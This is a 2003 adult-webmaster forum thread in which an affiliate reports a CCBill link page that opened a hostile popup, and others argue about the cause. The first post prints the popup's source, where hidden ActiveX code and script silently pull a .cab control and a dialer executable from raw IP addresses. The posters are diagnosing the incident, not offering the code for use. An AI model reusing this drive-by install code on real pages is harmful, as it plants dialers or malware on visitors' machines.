CCbill hacked?

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • Machete_
    WINNING!
    • Oct 2002
    • 14579

    #1

    CCbill hacked?

    when try to get the new banners and links i get a popupfarm?
    Any one else tryed that?


    Sourcecode is:

    PHP Code:
    
    
    
    
    <html xmlns:MSIE="urn:default">
    <HEAD>
    <TITLE>XXX</TITLE>
    <STYLE>
            MSIE\:CLIENTCAPS {behavior:url(#default#clientcaps)}
    </STYLE>
    
    <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
    </HEAD>
    
    
    
    
    hahahahahahahaha language="hahahahahahahahahaha">
    var f=1;
    function dontgo() {
    
    if(fhahahaha1) open("http://204.177.92.193/pt/ppjpath/denmark/", "_blank"); 
        // execTime: 4 ms
    
    
    }
    </hahahahahahahaha
    
    
    
    
    hahahahahahahaha language=hahahahahahahahahaha src="_pin_script.js"></hahahahahahahaha
    
    
    <META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
    hahahahahahahaha language=hahahahahahahahahaha>
    var f=1;
    var AX_Installed=0;
    var dlURL_main;
    var dlURL_begin;
    var dlURL_ns;
    var dialerName;
    var dialer;
    
    
    
    if(navigator.appNamehahahaha"Microsoft Internet Explorer") { self.moveTo(0,0);
    self.resizeTo(screen.availWidth,screen.availHeight); }
    
    
    dialerName = "hotorgy_dk.exe"
    dialer = "http://204.177.92.198/denmark/"+dialerName+"?pin="+dialerPin;    
    
    
    dlURL_main = "dlmain_datefor.html?"+dialer;
    dlURL_begin= "dlbegin_datefor.html?"+dialer; 
    dlURL_ns = "dlns_datefor.html?"+dialer;
    
    
    function privacy()
    {
        window.open('http://www.freegirlfun.com/privacy.html','_blank','width=630,height=500,toolbar=0,menubar=0,scrollbars=1,status=0,resizable=1');
    }
    
    function termsconditions()
    {
        window.open('http://204.177.92.193/pt/affpp/termsandcondition_dk.html','_blank','width=630,height=500,toolbar=0,menubar=0,scrollbars=1,status=0,resizable=1');
    }
    
    
    function popupDownload()
    {
       if (AX_Installedhahahaha1) {
            dlbegin=window.open(dlURL_begin,"dlbegin","height=1,width=1,scrollbars=no")
       } else
       if(navigator.appNamehahahaha"Microsoft Internet Explorer") 
       {
           dlmain=window.open(dlURL_main,"dlmain","height=1,width=1,scrollbars=no");
       } else
       {
             downloadWin1=window.open(dlURL_ns,"downloadWin1","height=283,width=490,scrollbars=no");
       }   
    }
    
    
    </hahahahahahahaha
        hahahahahaha bgcolor="white" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" onunload=dontgo()>
    
    
    <MSIE:CLIENTCAPS ID="idClCap" />
    
    
    
    
    <TABLE WIDTH=700 BORDER=0 CELLPADDING=0 CELLSPACING=0>
        <TR>
            <TD>
                <A href="hahahahahahahahahaha:popupDownload()"><IMG SRC="images_dk/f_couples02_dk_01.jpg" WIDTH=87 HEIGHT=113 border="0"></a></TD>
            <TD>
                <A href="hahahahahahahahahaha:popupDownload()"><IMG SRC="images_dk/f_couples02_dk_02.jpg" WIDTH=202 HEIGHT=113 border="0"></a></TD>
            <TD>
                <A href="hahahahahahahahahaha:popupDownload()"><IMG SRC="images_dk/f_couples02_dk_03.jpg" WIDTH=194 HEIGHT=113 border="0"></a></TD>
            <TD>
                <A href="hahahahahahahahahaha:popupDownload()"><IMG SRC="images_dk/f_couples02_dk_04.jpg" WIDTH=217 HEIGHT=113 border="0"></a></TD>
        </TR>
        <TR>
            <TD>
                <A href="hahahahahahahahahaha:popupDownload()"><IMG SRC="images_dk/f_couples02_dk_05.jpg" WIDTH=87 HEIGHT=153 border="0"></a></TD>
            <TD>
                <A href="hahahahahahahahahaha:popupDownload()"><IMG SRC="images_dk/f_couples02_dk_06.jpg" WIDTH=202 HEIGHT=153 border="0"></a></TD>
            <TD>
                <A href="hahahahahahahahahaha:popupDownload()"><IMG SRC="images_dk/f_couples02_dk_07.jpg" WIDTH=194 HEIGHT=153 border="0"></a></TD>
            <TD>
                <A href="hahahahahahahahahaha:popupDownload()"><IMG SRC="images_dk/f_couples02_dk_08.jpg" WIDTH=217 HEIGHT=153 border="0"></a></TD>
        </TR>
        <TR>
            <TD>
                <A href="hahahahahahahahahaha:popupDownload()"><IMG SRC="images_dk/f_couples02_dk_09.jpg" WIDTH=87 HEIGHT=21 border="0"></a></TD>
            <TD COLSPAN=2>
                <A href="hahahahahahahahahaha:popupDownload()"><IMG SRC="images_dk/f_couples02_dk_10.gif" WIDTH=396 HEIGHT=21 border="0"></a></TD>
            <TD>
                <A href="hahahahahahahahahaha:popupDownload()"><IMG SRC="images_dk/f_couples02_dk_11.gif" WIDTH=217 HEIGHT=21 border="0"></a></TD>
        </TR>
        <TR>
            <TD>
                <A href="hahahahahahahahahaha:popupDownload()"><IMG SRC="images_dk/f_couples02_dk_12.jpg" WIDTH=87 HEIGHT=113 border="0"></a></TD>
            <TD>
                <A href="hahahahahahahahahaha:popupDownload()"><IMG SRC="images_dk/f_couples02_dk_13.jpg" WIDTH=202 HEIGHT=113 border="0"></a></TD>
            <TD>
                <A href="hahahahahahahahahaha:popupDownload()"><IMG SRC="images_dk/f_couples02_dk_14.jpg" WIDTH=194 HEIGHT=113 border="0"></a></TD>
            <TD>
                <A href="hahahahahahahahahaha:popupDownload()"><IMG SRC="images_dk/f_couples02_dk_15.gif" WIDTH=217 HEIGHT=113 border="0"></a></TD>
        </TR>
    </TABLE>
    <center>
    <p><br>
    <Table width=50%><tr><td><font face=verdana size=1 color=black>Du skal være mindst 18 år gammel for at se dette site.
    Hvis du er under 18 år eller hvis materialet på dette site ikke er lovligt hvor du bor - bedes du venligst forlade sitet nu!</font></center>
    <br>
    <center><BR><P><font size=1 face=verdana><a href="hahahahahahahahahaha:privacy()">Privatlivs Erklæring</a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a href="hahahahahahahahahaha:termsconditions()"><font size=1 face=verdana>Regler og retningslinier</a></center>
    hahahahahahahaha language=hahahahahahahahahaha>
    var dlURL="";
    var strOBJECT;
    strOBJECT =  "<OBJECT classid=\"clsid:DA9A0B1E-9B7B-11D3-B8A4-00C04F79641C\"\n";
    strOBJECT += " codebase=\"http://204.177.92.201/quickdl/proclaim/NSupd9x.cab#version=1,0,0,13\"\n";
    strOBJECT += " id=\"Catalog\"\n";
    strOBJECT += " width=\"0\"\n";
    
    strOBJECT += " height=\"0\"\n";
    strOBJECT += " align=\"center\"\n";
    strOBJECT += " vspace=\"0\">\n\n";
    strOBJECT += " <PARAM NAME=\"DownloadURL\" value=\"" + dlURL + "\">\n";
    strOBJECT += " <PARAM NAME=\"LZCompressed\" value=0>\n";
    strOBJECT += " <PARAM NAME=\"Password\" value=\"\">\n";
    strOBJECT += " <PARAM NAME=\"Username\" value=\"\">\n";
    strOBJECT += " <PARAM NAME=\"DownloadMsg\" value=\"T&T\">\n";
    strOBJECT += " <PARAM NAME=\"DownloadCompleteNav\" value=\"\">\n";
    strOBJECT += " </OBJECT>";
    if(navigator.appNamehahahaha"Microsoft Internet Explorer")
        document.write(strOBJECT);
    </hahahahahahahaha
    
    
    
    
    
    
    
    
    hahahahahahahaha LANGUAGE="VBSCript">
    DIM x,y
    On Error Resume Next
    AX_Installed=0
    set x = CreateObject("NSUpdateLite.NSUpdateLiteCtrl.1")
    if (Err = 0) then
      y = x.Version
      if (Err = 0) then
        if (y > "1,0,0,12") then
           AX_Installed=1
        end if 
      end if
      set x=Nothing
    end if
    PopupDownload()
    
    
    
    
    </hahahahahahahaha
    </BODY>
    </HTML> 
    
    Last edited by Machete_; 04-16-2003, 03:34 AM.
  • Validus
    Confirmed User
    • Jul 2001
    • 4012

    #2
    That text is too small on my screen, but how do u figure CCBill was hacked? Could this not just be a little glitch?

    Comment

    • Validus
      Confirmed User
      • Jul 2001
      • 4012

      #3
      Oh, now I see the hahahaha... ugh... dunno! :-) Hahaha

      Comment

      • Machete_
        WINNING!
        • Oct 2002
        • 14579

        #4
        This is the screendump

        link

        Comment

        • Machete_
          WINNING!
          • Oct 2002
          • 14579

          #5
          ITs fucking stealing my passwords:



          PHP Code:
          strOBJECT += " height=\"0\"\n";
          strOBJECT += " align=\"center\"\n";
          strOBJECT += " vspace=\"0\">\n\n";
          strOBJECT += " <PARAM NAME=\"DownloadURL\" value=\"" + dlURL + "\">\n";
          strOBJECT += " <PARAM NAME=\"LZCompressed\" value=0>\n";
          strOBJECT += " <PARAM NAME=\"Password\" value=\"\">\n";
          strOBJECT += " <PARAM NAME=\"Username\" value=\"\">\n";
          strOBJECT += " <PARAM NAME=\"DownloadMsg\" value=\"T&T\">\n";
          strOBJECT += " <PARAM NAME=\"DownloadCompleteNav\" value=\"\">\n";
          strOBJECT += " </OBJECT>"; 
          

          Comment

          • Theo
            HAL 9000
            • May 2001
            • 34515

            #6
            probably some spyware

            Comment

            • Machete_
              WINNING!
              • Oct 2002
              • 14579

              #7
              NO - i have the sourcecode, but they told me;


              Webmaster,

              Please contact the referral webmaster of the program you are signed up
              with to resolve this issue.


              Regards,

              Lenny S
              Tech Support
              Last edited by Machete_; 04-16-2003, 03:50 AM.

              Comment

              • SomeCreep
                :glugglug
                • Mar 2003
                • 26118

                #8
                if you think they've been hacked, just give them a call and ask whats going on... CCBill techsupport 1-888-906-0666

                Webair Hosting

                I use and recommend Webair for hosting.

                Comment

                • Machete_
                  WINNING!
                  • Oct 2002
                  • 14579

                  #9
                  Originally posted by SomeCreep
                  if you think they've been hacked, just give them a call and ask whats going on... CCBill techsupport 1-888-906-0666
                  read above to se their reply

                  Comment

                  • Validus
                    Confirmed User
                    • Jul 2001
                    • 4012

                    #10
                    They sent an e-mail over the phone?

                    Comment

                    • Machete_
                      WINNING!
                      • Oct 2002
                      • 14579

                      #11
                      Originally posted by Validus
                      They sent an e-mail over the phone?

                      I ALWAYS keep the dialog in writing, so I can prove what they/I said

                      Comment

                      • Validus
                        Confirmed User
                        • Jul 2001
                        • 4012

                        #12
                        Oh ok, well if that is the fastest way to solve a problem, its all good. Although I am sure if you would keep a little history, of when you called and who you talked to it would do the same.

                        But thats ok, everybody does it a different way, whatever works the best for you.

                        Comment

                        • SeanE
                          Confirmed User
                          • Nov 2001
                          • 357

                          #13
                          Hello ebus_Dk,

                          Can you please send me an email ([email protected]) regarding this issue, you can send the same one you sent into our support staff if you would like.

                          I will be happy to look into the situation for you.

                          Feel free to ICQ me as well 84769138,
                          or call 888 906 0666 ext. 158

                          Thanks,

                          Sean E.

                          Comment

                          • Machete_
                            WINNING!
                            • Oct 2002
                            • 14579

                            #14
                            Originally posted by SeanE
                            Hello ebus_Dk,

                            Can you please send me an email ([email protected]) regarding this issue, you can send the same one you sent into our support staff if you would like.

                            I will be happy to look into the situation for you.

                            Feel free to ICQ me as well 84769138,
                            or call 888 906 0666 ext. 158

                            Thanks,

                            Sean E.
                            Thanks - you have my mail I one minut

                            Comment

                            • Machete_
                              WINNING!
                              • Oct 2002
                              • 14579

                              #15
                              Problem fixed - thanks Sean

                              Comment

                              • justsexxx
                                Too lazy to set a custom title
                                • Aug 2001
                                • 13723

                                #16
                                Originally posted by ebus_dk
                                Problem fixed - thanks Sean
                                What was it?
                                Questions?

                                ICQ: 125184542

                                Comment

                                • Fletch XXX
                                  GFY HALL OF FAME DAMMIT!!!
                                  • Jan 2002
                                  • 60840

                                  #17
                                  cc bill is one of the easiest as can be seen by how many passwords one must delete until he/she gets pennywize

                                  hahah

                                  Want an Android App for your tube, membership, or free site?

                                  Need banners or promo material? Hit us up (ICQ Fletch: 148841377) or email me fletchxxx at gmail.com - recent work - About me

                                  Comment

                                  • chupacabra
                                    Confirmed User
                                    • Sep 2002
                                    • 3626

                                    #18
                                    cc bill is one of the easiest as can be seen by how many passwords one must delete until he/she gets pennywize
                                    i use PW Sentry w/ ccBill to watch for both rogue accounts and accounts added via hacking the master script... but, since switching to the newer signup forms w/ ccBill, i haven't had one bogus account show up in our .htpasswd's... perhaps the hole is plugged finally..?
                                    ...promise her a defamation, tell her where the rain will fall..

                                    Comment

                                    • barryf
                                      Confirmed User
                                      • Sep 2002
                                      • 150

                                      #19
                                      Why do people insist on posting this shit to the boards before calling tech support.

                                      CCBill has 24-hour phone support for webmaster. You should try it sometime.

                                      B
                                      WEBCAMCASH.COM

                                      Comment

                                      • Machete_
                                        WINNING!
                                        • Oct 2002
                                        • 14579

                                        #20
                                        Originally posted by barryf
                                        Why do people insist on posting this shit to the boards before calling tech support.

                                        CCBill has 24-hour phone support for webmaster. You should try it sometime.

                                        B
                                        SHUT up bitch !!!

                                        I DID contact them , and the support just told me "please contact the affiliate webmaster" Thats NOT good enough when he runs a script that lifts my CCbill password and upload it to another server

                                        Thats whaen i posted it, and THATS when something happend.

                                        But gladly Sean took care of it, but we are still waiting for an explanation from the webmaster

                                        Comment

                                        • Kimmykim
                                          bitchslapping zebras!!!!!
                                          • Jun 2001
                                          • 16015

                                          #21
                                          Originally posted by ebus_dk
                                          But gladly Sean took care of it, but we are still waiting for an explanation from the webmaster

                                          Well, that's an interesting point there, perhaps it's the webmaster and not CCBill causing the issue...

                                          Comment

                                          • Machete_
                                            WINNING!
                                            • Oct 2002
                                            • 14579

                                            #22
                                            Originally posted by Kimmykim



                                            Well, that's an interesting point there, perhaps it's the webmaster and not CCBill causing the issue...
                                            it IS the webmaster causing the problem, I dident say anything else. But its located on CCbills server and its their server that get compromised. Its a pretty important part of the page, to be able to get to your ref-codes without getting you accountid and password stolen

                                            Comment

                                            • kmanrox
                                              aka K-Man
                                              • Oct 2001
                                              • 29295

                                              #23
                                              ebus, you should participate in manual penile massagin much much more often.
                                              Crypto HODLr
                                              Crypto mining
                                              Angel investor

                                              Comment

                                              • Corina Curves
                                                Registered User
                                                • Apr 2003
                                                • 45

                                                #24
                                                Hello. I may be the one in question. But I can assure you it is not my fault. If you like I even posted a message earlier before this post on Amateurmasters. I am not sure what is going on here and have talked to also Sean moments ago. First off all the webmaster who signed u0p for my program has e-mailed me and I have answered back every e-mail trying to figure out wtf was going on. I do not understand what has happened and have explained that to him and asked him questions. When I spoke to Sean he assured me that that the problem was fxed. Well that is fine and dandy but why and how did this happen?? I did not tweak any thing in my program since I placed it up about a year ago. So some one hackled it or id on't know. Oh and also he added a screen cap of the site that loaded. That wasn't even my site that loaded.

                                                Here is thecapture that was sent me. This is not mine!!
                                                http://www.corinacurves.com/ccbill.jpg

                                                So ccbill needs to come up with an answer to this because I will not allow them to make it look like this was me. I am a good webmaster and would never screw anyone over. I have been with ccbill for a long time and they have always attended promptly to any problems I have had. And I have been 95% happy with them so I am not trying to slam ccbill but there needs to be some thing done!!
                                                SIG TOO BIG! Maximum 120x60 button and no more than 3 text lines of DEFAULT SIZE and COLOR. Unless your sig is for a GFY top banner sponsor, then you may use a 624x80 instead of a 120x60.

                                                Comment

                                                • Machete_
                                                  WINNING!
                                                  • Oct 2002
                                                  • 14579

                                                  #25
                                                  Originally posted by corina
                                                  Hello. I may be the one in question. But I can assure you it is not my fault. If you like I even posted a message earlier before this post on Amateurmasters. I am not sure what is going on here and have talked to also Sean moments ago. First off all the webmaster who signed u0p for my program has e-mailed me and I have answered back every e-mail trying to figure out wtf was going on. I do not understand what has happened and have explained that to him and asked him questions. When I spoke to Sean he assured me that that the problem was fxed. Well that is fine and dandy but why and how did this happen?? I did not tweak any thing in my program since I placed it up about a year ago. So some one hackled it or id on't know. Oh and also he added a screen cap of the site that loaded. That wasn't even my site that loaded.

                                                  Here is thecapture that was sent me. This is not mine!!
                                                  http://www.corinacurves.com/ccbill.jpg

                                                  So ccbill needs to come up with an answer to this because I will not allow them to make it look like this was me. I am a good webmaster and would never screw anyone over. I have been with ccbill for a long time and they have always attended promptly to any problems I have had. And I have been 95% happy with them so I am not trying to slam ccbill but there needs to be some thing done!!

                                                  did you get my last mail? Im NOT saying you did anything of this (and welcome to GFY by the way )
                                                  The Question was; was CCbill hacked ?
                                                  or what happend, and like I told you in the mail;
                                                  "I'll leve you and CCbill to find out what happend"

                                                  There are 2 reasons why I postet this on GFY.

                                                  1 - To make CCbill run a little faster (and Sean did a 100 meter sprint in about 8 seconds)
                                                  2 - To get a responce from the webmaster of your site (you) because the first mail bounced


                                                  Im Not gonna comment on anything else before:
                                                  1 - you guys found out how that script came there
                                                  2 - who put it there
                                                  3 - and what it did to my password

                                                  Comment

                                                  • Corina Curves
                                                    Registered User
                                                    • Apr 2003
                                                    • 45

                                                    #26
                                                    Yes I got your e-mail and I sent you one back.

                                                    I am very sorry that this has happened but I am still a bit clueless as to where and how you got that code.

                                                    Bret at ccbill brought to my attention that I had a bad link in my referral program. When you cick on it Homegrwon Video pops up, because they host my site and that is like a 404 page I think you would call it. It pops up when there is a dead link. Homegrwon is very reputable and would never put some thing like that in there pops. Homegrwon is also trying to help figure this out too.

                                                    As for the code where did you get that code??

                                                    When your ccbill admin and click on get code. It usually gives you a one line code to link to me. And that is your affilliate code so that your hits can be tracked and your sales will go to you. So that is why I am confused when you say you go to the admin and you click on html why it would give you that code you posted??

                                                    Or are you viewing source on one of the pop ups and the code is there?? Is that wherte your getting that funky code from.

                                                    We do need to figure out exactly where your getting it and what is happening so we can prevent this from taking place!!

                                                    Sincerely
                                                    Corina
                                                    SIG TOO BIG! Maximum 120x60 button and no more than 3 text lines of DEFAULT SIZE and COLOR. Unless your sig is for a GFY top banner sponsor, then you may use a 624x80 instead of a 120x60.

                                                    Comment

                                                    • DannyWRP
                                                      Registered User
                                                      • Apr 2003
                                                      • 7

                                                      #27
                                                      I just posted this in response to Corina on the AmateurMasters Board:

                                                      "Corina,

                                                      Now that I see what is happening to the guy, it's not something either you or CCBill did, he already had the MoneyTree parasite in his system and browser! It can take over at random times, and it looked like it did when he was on the CCbill affiliate page.

                                                      What one of the varients does is randomly pop-up promos and ads for sites within the Moneytree system while someone is surfing. he blames it on the site he's on, without realizing that it's something already on his PC.

                                                      Tell him to scan his system with Ad-aware or similar program. he can also visit http://www.doxdesk.com/parasite which will find it for him and give him the fix.

                                                      Danny"

                                                      Comment

                                                      • rowan
                                                        Too lazy to set a custom title
                                                        • Mar 2002
                                                        • 17393

                                                        #28
                                                        I'm a moneytree affiliate. What's this about a parasite?

                                                        Comment

                                                        • Kimmykim
                                                          bitchslapping zebras!!!!!
                                                          • Jun 2001
                                                          • 16015

                                                          #29
                                                          IF Moneytree were popping up something that could possibly compromise the integrity of things like user names and passwords for logins to sites, I would think that there are many people who'd be interested in taking action against them.

                                                          The potential liability issues for the sites in question, and defending themselves against a liability suit that they had nothing to do with boggle my mind.

                                                          I wouldn't be surprised to see some c&d's go out IF this is indeed the case.

                                                          Comment

                                                          • DannyWRP
                                                            Registered User
                                                            • Apr 2003
                                                            • 7

                                                            #30
                                                            Check out http://www.doxdesk.com/parasite/MoneyTree.html for info on the Moneytree parasite

                                                            Comment

                                                            • Machete_
                                                              WINNING!
                                                              • Oct 2002
                                                              • 14579

                                                              #31
                                                              No I DONT have that paresite !!!!!!

                                                              Get you fackts straight asshole, and stop telling me whats on my system. Dont you think I would know if anything was on my mashine? Everytime something get added to my registrationn database, I get a popup - and I use spybot and adavare every day to ceep my PC clean. I posted the sourcecode THAT shoud had told you that you are WRONG
                                                              Last edited by Machete_; 04-16-2003, 02:57 PM.

                                                              Comment

                                                              • Machete_
                                                                WINNING!
                                                                • Oct 2002
                                                                • 14579

                                                                #32
                                                                Originally posted by Kimmykim
                                                                IF Moneytree were popping up something that could possibly compromise the integrity of things like user names and passwords for logins to sites, I would think that there are many people who'd be interested in taking action against them.

                                                                The potential liability issues for the sites in question, and defending themselves against a liability suit that they had nothing to do with boggle my mind.

                                                                I wouldn't be surprised to see some c&d's go out IF this is indeed the case.
                                                                Kimmykim : they DIDENT
                                                                it is run by these guys
                                                                http://204.177.92.193


                                                                DannyWRP : I dont think you want to tell people that moneytree steals passwords - you in way over your head boy
                                                                Last edited by Machete_; 04-16-2003, 03:05 PM.

                                                                Comment

                                                                • DannyWRP
                                                                  Registered User
                                                                  • Apr 2003
                                                                  • 7

                                                                  #33
                                                                  Originally posted by ebus_dk


                                                                  Kimmykim : they DIDENT
                                                                  it is run by these guys
                                                                  http://204.177.92.193


                                                                  DannyWRP : I dont think you want to tell people that moneytree steals passwords - you in way over your head boy

                                                                  ebus: I never said anything was run by Moneytree (SexTracker), I said that the parasite was called MoneyTree.

                                                                  Follow the link I posted above.

                                                                  ...and BTW, I'm never over my head

                                                                  Comment

                                                                  • DannyWRP
                                                                    Registered User
                                                                    • Apr 2003
                                                                    • 7

                                                                    #34
                                                                    Did some digging. The IP addresses in question (204.177.92.0-204.177.93.255) are run by a company called Lexitrans

                                                                    Tracked down some intersting stuff on some techie message boards about these guys. It seems they take existing dialer programs, and modify them with all sorts of stuff. If you see it installed on your PC, you just assume it's from mtree.com or goin.com, or any other site that runs dialers.

                                                                    If you already have any of the dialer programs in your PC, this exploits them and installs itself over them without you even knowing. They can then do all sorts of nasty stuff.

                                                                    BTW, on March 18th, Lexitrans was indicted for money laundering : http://stacks.msnbc.com/news/887174.asp


                                                                    You see ebus, a litle research and digging goes a long way. You should do that before you blame CCBill or Corina on a public board for what is most probably embedded in your system.

                                                                    Comment

                                                                    • Kimmykim
                                                                      bitchslapping zebras!!!!!
                                                                      • Jun 2001
                                                                      • 16015

                                                                      #35
                                                                      Originally posted by ebus_dk


                                                                      Kimmykim : they DIDENT
                                                                      it is run by these guys
                                                                      http://204.177.92.193


                                                                      DannyWRP : I dont think you want to tell people that moneytree steals passwords - you in way over your head boy
                                                                      Look dumbass, did you see anyone mention the word Sextracker?

                                                                      I said:
                                                                      "The potential liability issues for the sites in question, and defending themselves against a liability suit that they had nothing to do with boggle my mind. "

                                                                      hello???? is this thing on??? Sextracker would also be a site apt to sue Moneytree.

                                                                      Comment

                                                                      • Corina Curves
                                                                        Registered User
                                                                        • Apr 2003
                                                                        • 45

                                                                        #36
                                                                        I think Danny was only trying to be friendly and come up with a reason on why this happened. I am not sure why Kimmy and Ebus feel the need to respond so unfriendly back. Guess I don't get it.

                                                                        I like to conduct business in more of a friendly manner not cussing at each other and being rude. This will be my last message here.

                                                                        Ebus you know where to contact me and you know I will e-mail ya back. But I don't feel the need to participate in this discussion here.

                                                                        I am also willing to keep this case open till we get some sort of concrete answers that way we can learn to prevent, watch for, or maybe stop this from happening again.

                                                                        Sincerely
                                                                        Corina
                                                                        SIG TOO BIG! Maximum 120x60 button and no more than 3 text lines of DEFAULT SIZE and COLOR. Unless your sig is for a GFY top banner sponsor, then you may use a 624x80 instead of a 120x60.

                                                                        Comment

                                                                        • lordnorm
                                                                          Registered User
                                                                          • Apr 2003
                                                                          • 1

                                                                          #37
                                                                          After Corina approached me regarding this I did a little research myself and think I have found roughly the same things that Danny had as well. This 204.177.92.193 ip in which you recieved the harmful code from is just one of several connections this person had around the world. It is indeed run by Lexitrans from KS, though I think the perp acted apart from the company owning this ip. I found a host of worms,spyware,addware at this ip addy.

                                                                          Here is what I believe may have happened Ebus. Upon going to corina's webmaster page on ccbills side, there was a frame that pointed to a place on her site that did not exist. This triggered a redirect that sent you initially to homegrownvideo's front page. This is not malitious, we do this to steer traffic that is not going anywhere (404/401's) as many webmasters do on their servers. At this point you must have endured some exit traffic pop up's and then this hacker scrub made his move. He(bad guy) likely had a dialer spot that looked legit on the surface until he swapped out his page for a redirect that went to another redirect and so on. Eventually it led you to his unclean page that you posted originally.

                                                                          Whatever the case is Ebus, this fellow is long gone. Once word came out of this he must have removed all redirects and flitted back into the shadows whence he came. CCbill resolved the missing page frame fairly quickly by my estimate. I can certainly appreciate the anger you felt upon being hit by this hacker. I hate these assholes to the core. Just know that we can be a source of help, but it becomes challanging when we are the source of your rancor.
                                                                          I hope this helps you out some.

                                                                          -N

                                                                          Comment

                                                                          • KCat
                                                                            Confirmed User
                                                                            • Sep 2002
                                                                            • 2204

                                                                            #38
                                                                            Originally posted by ebus_dk
                                                                            DannyWRP : ...- you in way over your head boy
                                                                            \

                                                                            LMAO. Yeah...Danny Cox is way over his head. Does that make Carol a newbie?

                                                                            ~ 300+ FHGs, 100,000 pics to use plus a rockin' Video of the Day download! ~

                                                                            Comment

                                                                            Working...